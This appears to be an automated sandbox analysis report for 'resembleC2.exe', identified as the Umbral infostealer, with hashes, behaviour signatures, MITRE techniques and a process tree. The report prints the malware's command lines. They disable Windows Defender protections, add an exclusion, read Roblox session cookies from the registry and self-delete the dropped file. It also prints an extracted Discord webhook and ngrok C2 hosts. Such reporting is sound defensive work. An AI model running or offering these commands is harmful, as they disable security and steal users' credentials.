Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
156s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
12/01/2025, 06:10
Static task
static1
Behavioral task
behavioral1
Sample
resembleC2.exe
Resource
win7-20241010-en
General
-
Target
resembleC2.exe
-
Size
128KB
-
MD5
4c8044c83f60465eae3cc16d7c858085
-
SHA1
bc837ba36a8f244283483210215a11607f05fb63
-
SHA256
331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8
-
SHA512
f4783ae1591dafc44b1731c34dfced82e5285099a4066b6492e063b1ca5edb4a0916fcad0617b38c0fc754c304d932879cf3014bfce83c0b9a7219f8bc737432
-
SSDEEP
3072:oRt4KXzdjBFUxzV4NsFYGvL9JjyVcUuyTRc8R:q4gRjBF4SKFYMLbjxUBRc8
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1326652489054818346/f_cBTMEYAkXYcTbEkW-MUwYrefMORTfuoofsZ5ymJ5yR8BQpohmaCuB-PwAuIP1xAUKw
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x0009000000016c23-13.dat family_umbral behavioral1/memory/2464-15-0x0000000000980000-0x00000000009C0000-memory.dmp family_umbral -
Umbral family
-
pid Process 1784 powershell.exe 1148 powershell.exe 1556 powershell.exe 2892 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts MoonHub.exe -
Executes dropped EXE 2 IoCs
pid Process 2600 6z2guuz0ldkdgc1o.exe 2464 MoonHub.exe -
Loads dropped DLL 1 IoCs
pid Process 2568 resembleC2.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 21 discord.com 58 0.tcp.eu.ngrok.io 73 0.tcp.eu.ngrok.io 6 0.tcp.eu.ngrok.io 13 0.tcp.eu.ngrok.io 20 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2628 cmd.exe 524 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2300 wmic.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_Classes\Local Settings rundll32.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 524 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2464 MoonHub.exe 2892 powershell.exe 1784 powershell.exe 1148 powershell.exe 2420 powershell.exe 1556 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2168 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2600 6z2guuz0ldkdgc1o.exe Token: SeDebugPrivilege 2464 MoonHub.exe Token: SeIncBasePriorityPrivilege 2600 6z2guuz0ldkdgc1o.exe Token: SeIncreaseQuotaPrivilege 1388 wmic.exe Token: SeSecurityPrivilege 1388 wmic.exe Token: SeTakeOwnershipPrivilege 1388 wmic.exe Token: SeLoadDriverPrivilege 1388 wmic.exe Token: SeSystemProfilePrivilege 1388 wmic.exe Token: SeSystemtimePrivilege 1388 wmic.exe Token: SeProfSingleProcessPrivilege 1388 wmic.exe Token: SeIncBasePriorityPrivilege 1388 wmic.exe Token: SeCreatePagefilePrivilege 1388 wmic.exe Token: SeBackupPrivilege 1388 wmic.exe Token: SeRestorePrivilege 1388 wmic.exe Token: SeShutdownPrivilege 1388 wmic.exe Token: SeDebugPrivilege 1388 wmic.exe Token: SeSystemEnvironmentPrivilege 1388 wmic.exe Token: SeRemoteShutdownPrivilege 1388 wmic.exe Token: SeUndockPrivilege 1388 wmic.exe Token: SeManageVolumePrivilege 1388 wmic.exe Token: 33 1388 wmic.exe Token: 34 1388 wmic.exe Token: 35 1388 wmic.exe Token: SeIncreaseQuotaPrivilege 1388 wmic.exe Token: SeSecurityPrivilege 1388 wmic.exe Token: SeTakeOwnershipPrivilege 1388 wmic.exe Token: SeLoadDriverPrivilege 1388 wmic.exe Token: SeSystemProfilePrivilege 1388 wmic.exe Token: SeSystemtimePrivilege 1388 wmic.exe Token: SeProfSingleProcessPrivilege 1388 wmic.exe Token: SeIncBasePriorityPrivilege 1388 wmic.exe Token: SeCreatePagefilePrivilege 1388 wmic.exe Token: SeBackupPrivilege 1388 wmic.exe Token: SeRestorePrivilege 1388 wmic.exe Token: SeShutdownPrivilege 1388 wmic.exe Token: SeDebugPrivilege 1388 wmic.exe Token: SeSystemEnvironmentPrivilege 1388 wmic.exe Token: SeRemoteShutdownPrivilege 1388 wmic.exe Token: SeUndockPrivilege 1388 wmic.exe Token: SeManageVolumePrivilege 1388 wmic.exe Token: 33 1388 wmic.exe Token: 34 1388 wmic.exe Token: 35 1388 wmic.exe Token: SeDebugPrivilege 2892 powershell.exe Token: SeDebugPrivilege 1784 powershell.exe Token: SeDebugPrivilege 1148 powershell.exe Token: SeDebugPrivilege 2420 powershell.exe Token: SeIncreaseQuotaPrivilege 1788 wmic.exe Token: SeSecurityPrivilege 1788 wmic.exe Token: SeTakeOwnershipPrivilege 1788 wmic.exe Token: SeLoadDriverPrivilege 1788 wmic.exe Token: SeSystemProfilePrivilege 1788 wmic.exe Token: SeSystemtimePrivilege 1788 wmic.exe Token: SeProfSingleProcessPrivilege 1788 wmic.exe Token: SeIncBasePriorityPrivilege 1788 wmic.exe Token: SeCreatePagefilePrivilege 1788 wmic.exe Token: SeBackupPrivilege 1788 wmic.exe Token: SeRestorePrivilege 1788 wmic.exe Token: SeShutdownPrivilege 1788 wmic.exe Token: SeDebugPrivilege 1788 wmic.exe Token: SeSystemEnvironmentPrivilege 1788 wmic.exe Token: SeRemoteShutdownPrivilege 1788 wmic.exe Token: SeUndockPrivilege 1788 wmic.exe Token: SeManageVolumePrivilege 1788 wmic.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2168 AcroRd32.exe 2168 AcroRd32.exe -
Suspicious use of WriteProcessMemory 52 IoCs
description pid Process procid_target PID 2568 wrote to memory of 2600 2568 resembleC2.exe 30 PID 2568 wrote to memory of 2600 2568 resembleC2.exe 30 PID 2568 wrote to memory of 2600 2568 resembleC2.exe 30 PID 2568 wrote to memory of 2976 2568 resembleC2.exe 31 PID 2568 wrote to memory of 2976 2568 resembleC2.exe 31 PID 2568 wrote to memory of 2976 2568 resembleC2.exe 31 PID 2568 wrote to memory of 2464 2568 resembleC2.exe 32 PID 2568 wrote to memory of 2464 2568 resembleC2.exe 32 PID 2568 wrote to memory of 2464 2568 resembleC2.exe 32 PID 2976 wrote to memory of 2168 2976 rundll32.exe 34 PID 2976 wrote to memory of 2168 2976 rundll32.exe 34 PID 2976 wrote to memory of 2168 2976 rundll32.exe 34 PID 2976 wrote to memory of 2168 2976 rundll32.exe 34 PID 2464 wrote to memory of 1388 2464 MoonHub.exe 36 PID 2464 wrote to memory of 1388 2464 MoonHub.exe 36 PID 2464 wrote to memory of 1388 2464 MoonHub.exe 36 PID 2464 wrote to memory of 556 2464 MoonHub.exe 38 PID 2464 wrote to memory of 556 2464 MoonHub.exe 38 PID 2464 wrote to memory of 556 2464 MoonHub.exe 38 PID 2464 wrote to memory of 2892 2464 MoonHub.exe 40 PID 2464 wrote to memory of 2892 2464 MoonHub.exe 40 PID 2464 wrote to memory of 2892 2464 MoonHub.exe 40 PID 2464 wrote to memory of 1784 2464 MoonHub.exe 42 PID 2464 wrote to memory of 1784 2464 MoonHub.exe 42 PID 2464 wrote to memory of 1784 2464 MoonHub.exe 42 PID 2464 wrote to memory of 1148 2464 MoonHub.exe 44 PID 2464 wrote to memory of 1148 2464 MoonHub.exe 44 PID 2464 wrote to memory of 1148 2464 MoonHub.exe 44 PID 2464 wrote to memory of 2420 2464 MoonHub.exe 46 PID 2464 wrote to memory of 2420 2464 MoonHub.exe 46 PID 2464 wrote to memory of 2420 2464 MoonHub.exe 46 PID 2464 wrote to memory of 1788 2464 MoonHub.exe 48 PID 2464 wrote to memory of 1788 2464 MoonHub.exe 48 PID 2464 wrote to memory of 1788 2464 MoonHub.exe 48 PID 2464 wrote to memory of 2624 2464 MoonHub.exe 50 PID 2464 wrote to memory of 2624 2464 MoonHub.exe 50 PID 2464 wrote to memory of 2624 2464 MoonHub.exe 50 PID 2464 wrote to memory of 2140 2464 MoonHub.exe 52 PID 2464 wrote to memory of 2140 2464 MoonHub.exe 52 PID 2464 wrote to memory of 2140 2464 MoonHub.exe 52 PID 2464 wrote to memory of 1556 2464 MoonHub.exe 54 PID 2464 wrote to memory of 1556 2464 MoonHub.exe 54 PID 2464 wrote to memory of 1556 2464 MoonHub.exe 54 PID 2464 wrote to memory of 2300 2464 MoonHub.exe 56 PID 2464 wrote to memory of 2300 2464 MoonHub.exe 56 PID 2464 wrote to memory of 2300 2464 MoonHub.exe 56 PID 2464 wrote to memory of 2628 2464 MoonHub.exe 58 PID 2464 wrote to memory of 2628 2464 MoonHub.exe 58 PID 2464 wrote to memory of 2628 2464 MoonHub.exe 58 PID 2628 wrote to memory of 524 2628 cmd.exe 60 PID 2628 wrote to memory of 524 2628 cmd.exe 60 PID 2628 wrote to memory of 524 2628 cmd.exe 60 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 556 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\resembleC2.exe"C:\Users\Admin\AppData\Local\Temp\resembleC2.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Users\Admin\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe"C:\Users\Admin\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2600
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\resemble.py2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\resemble.py"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2168
-
-
-
C:\Users\Admin\AppData\Local\Temp\MoonHub.exe"C:\Users\Admin\AppData\Local\Temp\MoonHub.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1388
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\MoonHub.exe"3⤵
- Views/modifies file attributes
PID:556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\MoonHub.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1788
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:2624
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:2140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1556
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:2300
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\MoonHub.exe" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:524
-
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
231KB
MD5f70b5e56a09af292d4e909c547f9c8c0
SHA1577883bdbe8dc9582e15e7a1212b1fe432bafce3
SHA2568fd22c5acb3144dbaa5ab3f9dd5901eb6f3beef67e72ea431246c6a790c067de
SHA512e54ccb56aa6473abd3530493933d5164f2dff02076e0f03443382f02d177a52e318d8d0f432e6a3fb5620eaffd09f2dbf6ccbf9698ba149b149c594fa162d879
-
Filesize
27KB
MD523f1fabaef532d89fcb6d5bb14a36ef3
SHA1679a82ed172d49f298bf07b6fa0de9b6c2ce0046
SHA256e4410bc67b1ee8af2df456713b85040917b8cf749fb7d660feeb625b25ec9c51
SHA51296e2baa6ce0220b9ad167b60220c683d5b080a9ba9a2e4d320aae6989f4aa2d241f8078e69bdd2da39a20d9b57ae84240da912d29e5e1db36cc90cf6a0537458
-
Filesize
3KB
MD5bfa21b8f3a06e006ef7a289045535286
SHA10598506c45c41058ab867a77492738cf8e547cd6
SHA256afd0d1a3c0d214dcc99a11476dbac7b4bb7d1087199de4f326b2f1dbd0725848
SHA512a5c9e79f6b9f640184fe97fc8353f9dff0b145baa863b31c7e7fb942849eed87b14403dae865a3bd40b09dd8c35335970ccb4c0f8a99af9347db867658f7c5f5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD56b56d190714cd19f656cc4b28e9694fb
SHA1dd5c4a8c217f40b42f108dd6ae2033a20fdfb090
SHA256cf64f66cbf402e91bee86f1e23fca52e4d5b295dc7e24bc8982a863657fc6534
SHA5121680068a38e56e6bedce08c4462d6f505e7b338510d73de98e5078111dac03cf240561da33387417bea52873aa9052ccbb5472d3f3c00a8a7d880f90ff767187
-
Filesize
45KB
MD58c7d2f0a936dbe6d0899d40171ffb668
SHA10b22fcd904f3b0fa2555a32a2635423668fc4616
SHA25685f5f5acb54c30efd4f84c0f11c834b7dab98c5bb7357bddcd29fbe5babc4db6
SHA512463a48ec2752fd002e82dfe555abd03fc666a523da99e0e848788eeff6f98d06d36a360cfd7ad70d342bb4c90a49131a3428f1404d17e04a7fe5a1022c1faa65